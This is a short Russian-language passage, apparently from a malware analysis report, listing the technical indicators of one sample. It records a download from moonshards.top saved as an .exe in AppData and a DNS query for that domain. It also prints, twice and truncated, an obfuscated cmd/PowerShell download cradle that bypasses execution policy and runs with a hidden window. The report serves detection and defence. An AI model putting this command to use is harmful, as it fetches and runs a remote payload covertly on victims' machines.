Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWERs^h^ELL.Ex^e ^-ExecUtI^O^nP^OLIC^Y by^P^ass -NOPR^OfILE -^W^I^n^d^oWSTy^LE^ hidD^eN (N^EW^-^O^b^j^eCt ^SyST^eM.n^E^T.webcLie^Nt)^.^dOwnLo^adF^il^e('http://moonshards.top/sea...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "pOWERs^h^ELL.Ex^e ^-ExecUtI^O^nP^OLIC^Y by^P^ass -NOPR^OfILE -^W^I^n^d^oWSTy^LE^ hidD^eN (N^EW^-^O^b^j^eCt ^SyST^eM.n^E^T.webcLie^Nt)^.^dOwnLo^adF^il^e('http://moonshards.top/sea...' (со скрытым окном)